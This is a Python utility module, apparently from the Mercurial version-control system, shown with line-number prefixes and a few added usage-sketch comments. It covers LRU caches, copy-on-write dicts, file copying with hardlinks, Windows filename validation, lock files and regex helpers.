1131 1131 # __setitem__() isn't called as of PyPy 5.8.0
1132 1132 def update(self, src):
1133 1133 if isinstance(src, dict):
1134 1134 src = src.iteritems()
1135 1135 for k, v in src:
1136 1136 self[k] = v
1137 1137
1138 1138 class cowdict(cow, dict):
1139 1139 """copy-on-write dict
1140 1140
1141 1141 Be sure to call d = d.preparewrite() before writing to d.
1142 1142
1143 1143 >>> a = cowdict()
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> b = a.copy()
1147 1147 >>> b is a
1148 1148 True
1149 1149 >>> c = b.copy()
1150 1150 >>> c is a
1151 1151 True
1152 1152 >>> a = a.preparewrite()
1153 1153 >>> b is a
1154 1154 False
1155 1155 >>> a is a.preparewrite()
1156 1156 True
1157 1157 >>> c = c.preparewrite()
1158 1158 >>> b is c
1159 1159 False
1160 1160 >>> b is b.preparewrite()
1161 1161 True
1162 1162 """
1163 1163
1164 1164 class cowsortdict(cow, sortdict):
1165 1165 """copy-on-write sortdict
1166 1166
1167 1167 Be sure to call d = d.preparewrite() before writing to d.
1168 1168 """
1169 1169
1170 1170 class transactional(object):
1171 1171 """Base class for making a transactional type into a context manager."""
1172 1172 __metaclass__ = abc.ABCMeta
1173 1173
1174 1174 @abc.abstractmethod
1175 1175 def close(self):
1176 1176 """Successfully closes the transaction."""
1177 1177
1178 1178 @abc.abstractmethod
1179 1179 def release(self):
1180 1180 """Marks the end of the transaction.
1181 1181
1182 1182 If the transaction has not been closed, it will be aborted.
1183 1183 """
1184 1184
1185 1185 def __enter__(self):
1186 1186 return self
1187 1187
1188 1188 def __exit__(self, exc_type, exc_val, exc_tb):
1189 1189 try:
1190 1190 if exc_type is None:
1191 1191 self.close()
1192 1192 finally:
1193 1193 self.release()
1194 1194
1195 1195 @contextlib.contextmanager
1196 1196 def acceptintervention(tr=None):
1197 1197 """A context manager that closes the transaction on InterventionRequired
1198 1198
1199 1199 If no transaction was provided, this simply runs the body and returns
1200 1200 """
1201 1201 if not tr:
1202 1202 yield
1203 1203 return
1204 1204 try:
1205 1205 yield
1206 1206 tr.close()
1207 1207 except error.InterventionRequired:
1208 1208 tr.close()
1209 1209 raise
1210 1210 finally:
1211 1211 tr.release()
1212 1212
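# Usage sketch ('tr' and 'dosomething' are hypothetical): the transaction is
# closed on success or InterventionRequired and released either way.
#
#   >>> with acceptintervention(tr):
#   ...     dosomething()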
1213 1213 @contextlib.contextmanager
1214 1214 def nullcontextmanager():
1215 1215 yield
1216 1216
1217 1217 class _lrucachenode(object):
1218 1218 """A node in a doubly linked list.
1219 1219
1220 1220 Holds a reference to nodes on either side as well as a key-value
1221 1221 pair for the dictionary entry.
1222 1222 """
1223 1223 __slots__ = (r'next', r'prev', r'key', r'value', r'cost')
1224 1224
1225 1225 def __init__(self):
1226 1226 self.next = None
1227 1227 self.prev = None
1228 1228
1229 1229 self.key = _notset
1230 1230 self.value = None
1231 1231 self.cost = 0
1232 1232
1233 1233 def markempty(self):
1234 1234 """Mark the node as emptied."""
1235 1235 self.key = _notset
1236 1236 self.value = None
1237 1237 self.cost = 0
1238 1238
1239 1239 class lrucachedict(object):
1240 1240 """Dict that caches most recent accesses and sets.
1241 1241
1242 1242 The dict consists of an actual backing dict - indexed by original
1243 1243 key - and a doubly linked circular list defining the order of entries in
1244 1244 the cache.
1245 1245
1246 1246 The head node is the newest entry in the cache. If the cache is full,
1247 1247 we recycle head.prev and make it the new head. Cache accesses result in
1248 1248 the node being moved to before the existing head and being marked as the
1249 1249 new head node.
1250 1250
1251 1251 Items in the cache can be inserted with an optional "cost" value. This is
1252 1252 simply an integer that is specified by the caller. The cache can be queried
1253 1253 for the total cost of all items presently in the cache.
1254 1254
1255 1255 The cache can also define a maximum cost. If a cache insertion would
1256 1256 cause the total cost of the cache to go beyond the maximum cost limit,
1257 1257 nodes will be evicted to make room for the new node. This can be used
1258 1258 to e.g. set a max memory limit and associate an estimated bytes size
1259 1259 cost to each item in the cache. By default, no maximum cost is enforced.
1260 1260 """
1261 1261 def __init__(self, max, maxcost=0):
1262 1262 self._cache = {}
1263 1263
1264 1264 self._head = head = _lrucachenode()
1265 1265 head.prev = head
1266 1266 head.next = head
1267 1267 self._size = 1
1268 1268 self.capacity = max
1269 1269 self.totalcost = 0
1270 1270 self.maxcost = maxcost
1271 1271
1272 1272 def __len__(self):
1273 1273 return len(self._cache)
1274 1274
1275 1275 def __contains__(self, k):
1276 1276 return k in self._cache
1277 1277
1278 1278 def __iter__(self):
1279 1279 # We don't have to iterate in cache order, but why not.
1280 1280 n = self._head
1281 1281 for i in range(len(self._cache)):
1282 1282 yield n.key
1283 1283 n = n.next
1284 1284
1285 1285 def __getitem__(self, k):
1286 1286 node = self._cache[k]
1287 1287 self._movetohead(node)
1288 1288 return node.value
1289 1289
1290 1290 def insert(self, k, v, cost=0):
1291 1291 """Insert a new item in the cache with optional cost value."""
1292 1292 node = self._cache.get(k)
1293 1293 # Replace existing value and mark as newest.
1294 1294 if node is not None:
1295 1295 self.totalcost -= node.cost
1296 1296 node.value = v
1297 1297 node.cost = cost
1298 1298 self.totalcost += cost
1299 1299 self._movetohead(node)
1300 1300
1301 1301 if self.maxcost:
1302 1302 self._enforcecostlimit()
1303 1303
1304 1304 return
1305 1305
1306 1306 if self._size < self.capacity:
1307 1307 node = self._addcapacity()
1308 1308 else:
1309 1309 # Grab the last/oldest item.
1310 1310 node = self._head.prev
1311 1311
1312 1312 # At capacity. Kill the old entry.
1313 1313 if node.key is not _notset:
1314 1314 self.totalcost -= node.cost
1315 1315 del self._cache[node.key]
1316 1316
1317 1317 node.key = k
1318 1318 node.value = v
1319 1319 node.cost = cost
1320 1320 self.totalcost += cost
1321 1321 self._cache[k] = node
1322 1322 # And mark it as newest entry. No need to adjust order since it
1323 1323 # is already self._head.prev.
1324 1324 self._head = node
1325 1325
1326 1326 if self.maxcost:
1327 1327 self._enforcecostlimit()
1328 1328
1329 1329 def __setitem__(self, k, v):
1330 1330 self.insert(k, v)
1331 1331
1332 1332 def __delitem__(self, k):
1333 1333 self.pop(k)
1334 1334
1335 1335 def pop(self, k, default=_notset):
1336 1336 try:
1337 1337 node = self._cache.pop(k)
1338 1338 except KeyError:
1339 1339 if default is _notset:
1340 1340 raise
1341 1341 return default
1342 1342 value = node.value
1343 1343 self.totalcost -= node.cost
1344 1344 node.markempty()
1345 1345
1346 1346 # Temporarily mark as newest item before re-adjusting head to make
1347 1347 # this node the oldest item.
1348 1348 self._movetohead(node)
1349 1349 self._head = node.next
1350 1350
1351 1351 return value
1352 1352
1353 1353 # Additional dict methods.
1354 1354
1355 1355 def get(self, k, default=None):
1356 1356 try:
1357 1357 return self.__getitem__(k)
1358 1358 except KeyError:
1359 1359 return default
1360 1360
1361 1361 def peek(self, k, default=_notset):
1362 1362 """Get the specified item without moving it to the head
1363 1363
1364 1364 Unlike get(), this doesn't mutate the internal state. But be aware
1365 1365 that this does not make peek() thread safe.
1366 1366 """
1367 1367 try:
1368 1368 node = self._cache[k]
1369 1369 return node.value
1370 1370 except KeyError:
1371 1371 if default is _notset:
1372 1372 raise
1373 1373 return default
1374 1374
1375 1375 def clear(self):
1376 1376 n = self._head
1377 1377 while n.key is not _notset:
1378 1378 self.totalcost -= n.cost
1379 1379 n.markempty()
1380 1380 n = n.next
1381 1381
1382 1382 self._cache.clear()
1383 1383
1384 1384 def copy(self, capacity=None, maxcost=0):
1385 1385 """Create a new cache as a copy of the current one.
1386 1386
1387 1387 By default, the new cache has the same capacity as the existing one.
1388 1388 But, the cache capacity can be changed as part of performing the
1389 1389 copy.
1390 1390
1391 1391 Items in the copy have an insertion/access order matching this
1392 1392 instance.
1393 1393 """
1394 1394
1395 1395 capacity = capacity or self.capacity
1396 1396 maxcost = maxcost or self.maxcost
1397 1397 result = lrucachedict(capacity, maxcost=maxcost)
1398 1398
1399 1399 # We copy entries by iterating in oldest-to-newest order so the copy
1400 1400 # has the correct ordering.
1401 1401
1402 1402 # Find the first non-empty entry.
1403 1403 n = self._head.prev
1404 1404 while n.key is _notset and n is not self._head:
1405 1405 n = n.prev
1406 1406
1407 1407 # We could potentially skip the first N items when decreasing capacity.
1408 1408 # But let's keep it simple unless it is a performance problem.
1409 1409 for i in range(len(self._cache)):
1410 1410 result.insert(n.key, n.value, cost=n.cost)
1411 1411 n = n.prev
1412 1412
1413 1413 return result
1414 1414
1415 1415 def popoldest(self):
1416 1416 """Remove the oldest item from the cache.
1417 1417
1418 1418 Returns the (key, value) describing the removed cache entry.
1419 1419 """
1420 1420 if not self._cache:
1421 1421 return
1422 1422
1423 1423 # Walk the linked list backwards starting at tail node until we hit
1424 1424 # a non-empty node.
1425 1425 n = self._head.prev
1426 1426 while n.key is _notset:
1427 1427 n = n.prev
1428 1428
1429 1429 key, value = n.key, n.value
1430 1430
1431 1431 # And remove it from the cache and mark it as empty.
1432 1432 del self._cache[n.key]
1433 1433 self.totalcost -= n.cost
1434 1434 n.markempty()
1435 1435
1436 1436 return key, value
1437 1437
1438 1438 def _movetohead(self, node):
1439 1439 """Mark a node as the newest, making it the new head.
1440 1440
1441 1441 When a node is accessed, it becomes the freshest entry in the LRU
1442 1442 list, which is denoted by self._head.
1443 1443
1444 1444 Visually, let's make ``N`` the new head node (* denotes head):
1445 1445
1446 1446 previous/oldest <-> head <-> next/next newest
1447 1447
1448 1448 ----<->--- A* ---<->-----
1449 1449 | |
1450 1450 E <-> D <-> N <-> C <-> B
1451 1451
1452 1452 To:
1453 1453
1454 1454 ----<->--- N* ---<->-----
1455 1455 | |
1456 1456 E <-> D <-> C <-> B <-> A
1457 1457
1458 1458 This requires the following moves:
1459 1459
1460 1460 C.next = D (node.prev.next = node.next)
1461 1461 D.prev = C (node.next.prev = node.prev)
1462 1462 E.next = N (head.prev.next = node)
1463 1463 N.prev = E (node.prev = head.prev)
1464 1464 N.next = A (node.next = head)
1465 1465 A.prev = N (head.prev = node)
1466 1466 """
1467 1467 head = self._head
1468 1468 # C.next = D
1469 1469 node.prev.next = node.next
1470 1470 # D.prev = C
1471 1471 node.next.prev = node.prev
1472 1472 # N.prev = E
1473 1473 node.prev = head.prev
1474 1474 # N.next = A
1475 1475 # It is tempting to do just "head" here, however if node is
1476 1476 # adjacent to head, this will do bad things.
1477 1477 node.next = head.prev.next
1478 1478 # E.next = N
1479 1479 node.next.prev = node
1480 1480 # A.prev = N
1481 1481 node.prev.next = node
1482 1482
1483 1483 self._head = node
1484 1484
1485 1485 def _addcapacity(self):
1486 1486 """Add a node to the circular linked list.
1487 1487
1488 1488 The new node is inserted before the head node.
1489 1489 """
1490 1490 head = self._head
1491 1491 node = _lrucachenode()
1492 1492 head.prev.next = node
1493 1493 node.prev = head.prev
1494 1494 node.next = head
1495 1495 head.prev = node
1496 1496 self._size += 1
1497 1497 return node
1498 1498
1499 1499 def _enforcecostlimit(self):
1500 1500 # This should run after an insertion. It should only be called if total
1501 1501 # cost limits are being enforced.
1502 1502 # The most recently inserted node is never evicted.
1503 1503 if len(self) <= 1 or self.totalcost <= self.maxcost:
1504 1504 return
1505 1505
1506 1506 # This is logically equivalent to calling popoldest() until we
1507 1507 # free up enough cost. We don't do that since popoldest() needs
1508 1508 # to walk the linked list and doing this in a loop would be
1509 1509 # quadratic. So we find the first non-empty node and then
1510 1510 # walk nodes until we free up enough capacity.
1511 1511 #
1512 1512 # If we only removed the minimum number of nodes to free enough
1513 1513 # cost at insert time, chances are high that the next insert would
1514 1514 # also require pruning. This would effectively constitute quadratic
1515 1515 # behavior for insert-heavy workloads. To mitigate this, we set a
1516 1516 # target cost that is a percentage of the max cost. This will tend
1517 1517 # to free more nodes when the high water mark is reached, which
1518 1518 # lowers the chances of needing to prune on the subsequent insert.
1519 1519 targetcost = int(self.maxcost * 0.75)
1520 1520
1521 1521 n = self._head.prev
1522 1522 while n.key is _notset:
1523 1523 n = n.prev
1524 1524
1525 1525 while len(self) > 1 and self.totalcost > targetcost:
1526 1526 del self._cache[n.key]
1527 1527 self.totalcost -= n.cost
1528 1528 n.markempty()
1529 1529 n = n.prev
1530 1530
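# Usage sketch: a four-entry cache with a total cost ceiling; inserts that
# push the total cost past maxcost evict the oldest entries first.
#
#   >>> d = lrucachedict(4, maxcost=100)
#   >>> d.insert(b'a', b'x' * 60, cost=60)
#   >>> d.insert(b'b', b'y' * 60, cost=60)   # evicts b'a' to get under 100
#   >>> b'a' in d
#   False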
1531 1531 def lrucachefunc(func):
1532 1532 '''cache most recent results of function calls'''
1533 1533 cache = {}
1534 1534 order = collections.deque()
1535 1535 if func.__code__.co_argcount == 1:
1536 1536 def f(arg):
1537 1537 if arg not in cache:
1538 1538 if len(cache) > 20:
1539 1539 del cache[order.popleft()]
1540 1540 cache[arg] = func(arg)
1541 1541 else:
1542 1542 order.remove(arg)
1543 1543 order.append(arg)
1544 1544 return cache[arg]
1545 1545 else:
1546 1546 def f(*args):
1547 1547 if args not in cache:
1548 1548 if len(cache) > 20:
1549 1549 del cache[order.popleft()]
1550 1550 cache[args] = func(*args)
1551 1551 else:
1552 1552 order.remove(args)
1553 1553 order.append(args)
1554 1554 return cache[args]
1555 1555
1556 1556 return f
1557 1557
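# A sketch like cachefunc, but only the ~20 most recently used distinct
# arguments stay cached:
#
#   >>> realpath = lrucachefunc(lambda p: os.path.realpath(p))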
1558 1558 class propertycache(object):
1559 1559 def __init__(self, func):
1560 1560 self.func = func
1561 1561 self.name = func.__name__
1562 1562 def __get__(self, obj, type=None):
1563 1563 result = self.func(obj)
1564 1564 self.cachevalue(obj, result)
1565 1565 return result
1566 1566
1567 1567 def cachevalue(self, obj, value):
1568 1568 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1569 1569 obj.__dict__[self.name] = value
1570 1570
1571 1571 def clearcachedproperty(obj, prop):
1572 1572 '''clear a cached property value, if one has been set'''
1573 1573 prop = pycompat.sysstr(prop)
1574 1574 if prop in obj.__dict__:
1575 1575 del obj.__dict__[prop]
1576 1576
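# Usage sketch (class and attribute names are hypothetical): compute an
# attribute once per instance, with an explicit invalidation hook.
#
#   >>> class repo(object):
#   ...     @propertycache
#   ...     def expensive(self):
#   ...         return computesomething()
#   >>> r = repo()
#   >>> r.expensive                            # computed once, then cached
#   >>> clearcachedproperty(r, b'expensive')   # force recomputation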
1577 1577 def increasingchunks(source, min=1024, max=65536):
1578 1578 '''return no less than min bytes per chunk while data remains,
1579 1579 doubling min after each chunk until it reaches max'''
1580 1580 def log2(x):
1581 1581 if not x:
1582 1582 return 0
1583 1583 i = 0
1584 1584 while x:
1585 1585 x >>= 1
1586 1586 i += 1
1587 1587 return i - 1
1588 1588
1589 1589 buf = []
1590 1590 blen = 0
1591 1591 for chunk in source:
1592 1592 buf.append(chunk)
1593 1593 blen += len(chunk)
1594 1594 if blen >= min:
1595 1595 if min < max:
1596 1596 min = min << 1
1597 1597 nmin = 1 << log2(blen)
1598 1598 if nmin > min:
1599 1599 min = nmin
1600 1600 if min > max:
1601 1601 min = max
1602 1602 yield ''.join(buf)
1603 1603 blen = 0
1604 1604 buf = []
1605 1605 if buf:
1606 1606 yield ''.join(buf)
1607 1607
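# A worked sketch: eight 600-byte chunks re-grouped with the default max;
# the yield threshold doubles after each emitted chunk.
#
#   >>> source = iter([b'a' * 600] * 8)
#   >>> [len(c) for c in increasingchunks(source, min=1024)]
#   [1200, 2400, 1200]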
1608 1608 def always(fn):
1609 1609 return True
1610 1610
1611 1611 def never(fn):
1612 1612 return False
1613 1613
1614 1614 def nogc(func):
1615 1615 """disable garbage collector
1616 1616
1617 1617 Python's garbage collector triggers a GC each time a certain number of
1618 1618 container objects (the number being defined by gc.get_threshold()) are
1619 1619 allocated even when marked not to be tracked by the collector. Tracking has
1620 1620 no effect on when GCs are triggered, only on what objects the GC looks
1621 1621 into. As a workaround, disable GC while building complex (huge)
1622 1622 containers.
1623 1623
1624 1624 This garbage collector issue has been fixed in 2.7, but it still affects
1625 1625 CPython's performance.
1626 1626 """
1627 1627 def wrapper(*args, **kwargs):
1628 1628 gcenabled = gc.isenabled()
1629 1629 gc.disable()
1630 1630 try:
1631 1631 return func(*args, **kwargs)
1632 1632 finally:
1633 1633 if gcenabled:
1634 1634 gc.enable()
1635 1635 return wrapper
1636 1636
1637 1637 if pycompat.ispypy:
1638 1638 # PyPy runs slower with gc disabled
1639 1639 nogc = lambda x: x
1640 1640
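# Usage sketch: decorate a function that builds a huge container.
#
#   >>> @nogc
#   ... def buildmap(pairs):
#   ...     return dict(pairs)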
1641 1641 def pathto(root, n1, n2):
1642 1642 '''return the relative path from one place to another.
1643 1643 root should use os.sep to separate directories
1644 1644 n1 should use os.sep to separate directories
1645 1645 n2 should use "/" to separate directories
1646 1646 returns an os.sep-separated path.
1647 1647
1648 1648 If n1 is a relative path, it's assumed to be
1649 1649 relative to root.
1650 1650 n2 should always be relative to root.
1651 1651 '''
1652 1652 if not n1:
1653 1653 return localpath(n2)
1654 1654 if os.path.isabs(n1):
1655 1655 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1656 1656 return os.path.join(root, localpath(n2))
1657 1657 n2 = '/'.join((pconvert(root), n2))
1658 1658 a, b = splitpath(n1), n2.split('/')
1659 1659 a.reverse()
1660 1660 b.reverse()
1661 1661 while a and b and a[-1] == b[-1]:
1662 1662 a.pop()
1663 1663 b.pop()
1664 1664 b.reverse()
1665 1665 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1666 1666
1667 1667 # the location of data files matching the source code
1668 1668 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1669 1669 # executable version (py2exe) doesn't support __file__
1670 1670 datapath = os.path.dirname(pycompat.sysexecutable)
1671 1671 else:
1672 1672 datapath = os.path.dirname(pycompat.fsencode(__file__))
1673 1673
1674 1674 i18n.setdatapath(datapath)
1675 1675
1676 1676 def checksignature(func):
1677 1677 '''wrap a function with code to check for calling errors'''
1678 1678 def check(*args, **kwargs):
1679 1679 try:
1680 1680 return func(*args, **kwargs)
1681 1681 except TypeError:
1682 1682 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1683 1683 raise error.SignatureError
1684 1684 raise
1685 1685
1686 1686 return check
1687 1687
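# A minimal sketch: a wrong-arity call surfaces as SignatureError instead of
# a bare TypeError.
#
#   >>> f = checksignature(lambda a, b: None)
#   >>> f(1)   # raises error.SignatureError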
1688 1688 # a whitelist of known filesystems where hardlinks work reliably
1689 1689 _hardlinkfswhitelist = {
1690 1690 'apfs',
1691 1691 'btrfs',
1692 1692 'ext2',
1693 1693 'ext3',
1694 1694 'ext4',
1695 1695 'hfs',
1696 1696 'jfs',
1697 1697 'NTFS',
1698 1698 'reiserfs',
1699 1699 'tmpfs',
1700 1700 'ufs',
1701 1701 'xfs',
1702 1702 'zfs',
1703 1703 }
1704 1704
1705 1705 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1706 1706 '''copy a file, preserving mode and optionally other stat info like
1707 1707 atime/mtime
1708 1708
1709 1709 checkambig argument is used with filestat, and is useful only if
1710 1710 destination file is guarded by any lock (e.g. repo.lock or
1711 1711 repo.wlock).
1712 1712
1713 1713 copystat and checkambig should be exclusive.
1714 1714 '''
1715 1715 assert not (copystat and checkambig)
1716 1716 oldstat = None
1717 1717 if os.path.lexists(dest):
1718 1718 if checkambig:
1719 1719 oldstat = checkambig and filestat.frompath(dest)
1720 1720 unlink(dest)
1721 1721 if hardlink:
1722 1722 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1723 1723 # unless we are confident that dest is on a whitelisted filesystem.
1724 1724 try:
1725 1725 fstype = getfstype(os.path.dirname(dest))
1726 1726 except OSError:
1727 1727 fstype = None
1728 1728 if fstype not in _hardlinkfswhitelist:
1729 1729 hardlink = False
1730 1730 if hardlink:
1731 1731 try:
1732 1732 oslink(src, dest)
1733 1733 return
1734 1734 except (IOError, OSError):
1735 1735 pass # fall back to normal copy
1736 1736 if os.path.islink(src):
1737 1737 os.symlink(os.readlink(src), dest)
1738 1738 # copystat is ignored for symlinks, but in general stat info isn't
1739 1739 # needed for them anyway
1740 1740 else:
1741 1741 try:
1742 1742 shutil.copyfile(src, dest)
1743 1743 if copystat:
1744 1744 # copystat also copies mode
1745 1745 shutil.copystat(src, dest)
1746 1746 else:
1747 1747 shutil.copymode(src, dest)
1748 1748 if oldstat and oldstat.stat:
1749 1749 newstat = filestat.frompath(dest)
1750 1750 if newstat.isambig(oldstat):
1751 1751 # stat of copied file is ambiguous to original one
1752 1752 advanced = (
1753 1753 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1754 1754 os.utime(dest, (advanced, advanced))
1755 1755 except shutil.Error as inst:
1756 1756 raise error.Abort(str(inst))
1757 1757
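# Usage sketch ('src' and 'dest' are hypothetical paths): request a hardlink
# and silently fall back to a real copy on non-whitelisted filesystems:
#
#   >>> copyfile(src, dest, hardlink=True)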
1758 1758 def copyfiles(src, dst, hardlink=None, progress=None):
1759 1759 """Copy a directory tree using hardlinks if possible."""
1760 1760 num = 0
1761 1761
1762 1762 def settopic():
1763 1763 if progress:
1764 1764 progress.topic = _('linking') if hardlink else _('copying')
1765 1765
1766 1766 if os.path.isdir(src):
1767 1767 if hardlink is None:
1768 1768 hardlink = (os.stat(src).st_dev ==
1769 1769 os.stat(os.path.dirname(dst)).st_dev)
1770 1770 settopic()
1771 1771 os.mkdir(dst)
1772 1772 for name, kind in listdir(src):
1773 1773 srcname = os.path.join(src, name)
1774 1774 dstname = os.path.join(dst, name)
1775 1775 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1776 1776 num += n
1777 1777 else:
1778 1778 if hardlink is None:
1779 1779 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1780 1780 os.stat(os.path.dirname(dst)).st_dev)
1781 1781 settopic()
1782 1782
1783 1783 if hardlink:
1784 1784 try:
1785 1785 oslink(src, dst)
1786 1786 except (IOError, OSError):
1787 1787 hardlink = False
1788 1788 shutil.copy(src, dst)
1789 1789 else:
1790 1790 shutil.copy(src, dst)
1791 1791 num += 1
1792 1792 if progress:
1793 1793 progress.increment()
1794 1794
1795 1795 return hardlink, num
1796 1796
1797 1797 _winreservednames = {
1798 1798 'con', 'prn', 'aux', 'nul',
1799 1799 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1800 1800 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1801 1801 }
1802 1802 _winreservedchars = ':*?"<>|'
1803 1803 def checkwinfilename(path):
1804 1804 r'''Check that the base-relative path is a valid filename on Windows.
1805 1805 Returns None if the path is ok, or a UI string describing the problem.
1806 1806
1807 1807 >>> checkwinfilename(b"just/a/normal/path")
1808 1808 >>> checkwinfilename(b"foo/bar/con.xml")
1809 1809 "filename contains 'con', which is reserved on Windows"
1810 1810 >>> checkwinfilename(b"foo/con.xml/bar")
1811 1811 "filename contains 'con', which is reserved on Windows"
1812 1812 >>> checkwinfilename(b"foo/bar/xml.con")
1813 1813 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1814 1814 "filename contains 'AUX', which is reserved on Windows"
1815 1815 >>> checkwinfilename(b"foo/bar/bla:.txt")
1816 1816 "filename contains ':', which is reserved on Windows"
1817 1817 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1818 1818 "filename contains '\\x07', which is invalid on Windows"
1819 1819 >>> checkwinfilename(b"foo/bar/bla ")
1820 1820 "filename ends with ' ', which is not allowed on Windows"
1821 1821 >>> checkwinfilename(b"../bar")
1822 1822 >>> checkwinfilename(b"foo\\")
1823 1823 "filename ends with '\\', which is invalid on Windows"
1824 1824 >>> checkwinfilename(b"foo\\/bar")
1825 1825 "directory name ends with '\\', which is invalid on Windows"
1826 1826 '''
1827 1827 if path.endswith('\\'):
1828 1828 return _("filename ends with '\\', which is invalid on Windows")
1829 1829 if '\\/' in path:
1830 1830 return _("directory name ends with '\\', which is invalid on Windows")
1831 1831 for n in path.replace('\\', '/').split('/'):
1832 1832 if not n:
1833 1833 continue
1834 1834 for c in _filenamebytestr(n):
1835 1835 if c in _winreservedchars:
1836 1836 return _("filename contains '%s', which is reserved "
1837 1837 "on Windows") % c
1838 1838 if ord(c) <= 31:
1839 1839 return _("filename contains '%s', which is invalid "
1840 1840 "on Windows") % stringutil.escapestr(c)
1841 1841 base = n.split('.')[0]
1842 1842 if base and base.lower() in _winreservednames:
1843 1843 return _("filename contains '%s', which is reserved "
1844 1844 "on Windows") % base
1845 1845 t = n[-1:]
1846 1846 if t in '. ' and n not in '..':
1847 1847 return _("filename ends with '%s', which is not allowed "
1848 1848 "on Windows") % t
1849 1849
1850 1850 if pycompat.iswindows:
1851 1851 checkosfilename = checkwinfilename
1852 1852 timer = time.clock
1853 1853 else:
1854 1854 checkosfilename = platform.checkosfilename
1855 1855 timer = time.time
1856 1856
1857 1857 if safehasattr(time, "perf_counter"):
1858 1858 timer = time.perf_counter
1859 1859
1860 1860 def makelock(info, pathname):
1861 1861 """Create a lock file atomically if possible
1862 1862
1863 1863 This may leave a stale lock file if symlinks aren't supported and a
1864 1864 signal interrupt is enabled.
1865 1865 """
1866 1866 try:
1867 1867 return os.symlink(info, pathname)
1868 1868 except OSError as why:
1869 1869 if why.errno == errno.EEXIST:
1870 1870 raise
1871 1871 except AttributeError: # no symlink in os
1872 1872 pass
1873 1873
1874 1874 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1875 1875 ld = os.open(pathname, flags)
1876 1876 os.write(ld, info)
1877 1877 os.close(ld)
1878 1878
1879 1879 def readlock(pathname):
1880 1880 try:
1881 1881 return readlink(pathname)
1882 1882 except OSError as why:
1883 1883 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1884 1884 raise
1885 1885 except AttributeError: # no symlink in os
1886 1886 pass
1887 1887 with posixfile(pathname, 'rb') as fp:
1888 1888 return fp.read()
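# Illustrative sketch of a lock round-trip using the two helpers above,
# assuming a writable temp directory (the path is hypothetical):
#
# >>> import os.path, tempfile
# >>> lockpath = os.path.join(tempfile.mkdtemp(), 'lk')
# >>> makelock('pid:12345', lockpath) # symlink if supported, else a file
# >>> readlock(lockpath)
# 'pid:12345'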
1889 1889
1890 1890 def fstat(fp):
1891 1891 '''stat file object that may not have fileno method.'''
1892 1892 try:
1893 1893 return os.fstat(fp.fileno())
1894 1894 except AttributeError:
1895 1895 return os.stat(fp.name)
1896 1896
1897 1897 # File system features
1898 1898
1899 1899 def fscasesensitive(path):
1900 1900 """
1901 1901 Return true if the given path is on a case-sensitive filesystem
1902 1902
1903 1903 Requires a path (like /foo/.hg) ending with a foldable final
1904 1904 directory component.
1905 1905 """
1906 1906 s1 = os.lstat(path)
1907 1907 d, b = os.path.split(path)
1908 1908 b2 = b.upper()
1909 1909 if b == b2:
1910 1910 b2 = b.lower()
1911 1911 if b == b2:
1912 1912 return True # no evidence against case sensitivity
1913 1913 p2 = os.path.join(d, b2)
1914 1914 try:
1915 1915 s2 = os.lstat(p2)
1916 1916 if s2 == s1:
1917 1917 return False
1918 1918 return True
1919 1919 except OSError:
1920 1920 return True
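# Illustrative sketch: probe a freshly created file with a foldable name;
# the result depends on the filesystem the temp directory lives on:
#
# >>> import os, tempfile
# >>> probe = os.path.join(tempfile.mkdtemp(), 'CaseProbe')
# >>> open(probe, 'w').close()
# >>> fscasesensitive(probe) # True on ext4; typically False on APFS/NTFS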
1921 1921
1922 1922 try:
1923 1923 import re2
1924 1924 _re2 = None
1925 1925 except ImportError:
1926 1926 _re2 = False
1927 1927
1928 1928 class _re(object):
1929 1929 def _checkre2(self):
1930 1930 global _re2
1931 1931 try:
1932 1932 # check if match works, see issue3964
1933 1933 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1934 1934 except ImportError:
1935 1935 _re2 = False
1936 1936
1937 1937 def compile(self, pat, flags=0):
1938 1938 '''Compile a regular expression, using re2 if possible
1939 1939
1940 1940 For best performance, use only re2-compatible regexp features. The
1941 1941 only flags from the re module that are re2-compatible are
1942 1942 IGNORECASE and MULTILINE.'''
1943 1943 if _re2 is None:
1944 1944 self._checkre2()
1945 1945 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1946 1946 if flags & remod.IGNORECASE:
1947 1947 pat = '(?i)' + pat
1948 1948 if flags & remod.MULTILINE:
1949 1949 pat = '(?m)' + pat
1950 1950 try:
1951 1951 return re2.compile(pat)
1952 1952 except re2.error:
1953 1953 pass
1954 1954 return remod.compile(pat, flags)
1955 1955
1956 1956 @propertycache
1957 1957 def escape(self):
1958 1958 '''Return the version of escape corresponding to self.compile.
1959 1959
1960 1960 This is imperfect because whether re2 or re is used for a particular
1961 1961 function depends on the flags, etc., but it's the best we can do.
1962 1962 '''
1963 1963 global _re2
1964 1964 if _re2 is None:
1965 1965 self._checkre2()
1966 1966 if _re2:
1967 1967 return re2.escape
1968 1968 else:
1969 1969 return remod.escape
1970 1970
1971 1971 re = _re()
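# Illustrative sketch: callers use the shared instance above, and re2 is
# picked transparently when it is importable (remod is the stdlib re):
#
# >>> pat = re.compile(br'^[a-f0-9]{40}$', remod.IGNORECASE)
# >>> bool(pat.match(b'Z' * 40)) # 'z' is not a hex digit
# False
# >>> bool(pat.match(b'A' * 40)) # matches thanks to IGNORECASE
# True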
1972 1972
1973 1973 _fspathcache = {}
1974 1974 def fspath(name, root):
1975 1975 '''Get name in the case stored in the filesystem
1976 1976
1977 1977 The name should be relative to root, and be normcase-ed for efficiency.
1978 1978
1979 1979 Note that this function is unnecessary for case-sensitive
1980 1980 filesystems, and should not be called there (simply because it's expensive).
1981 1981
1982 1982 The root should be normcase-ed, too.
1983 1983 '''
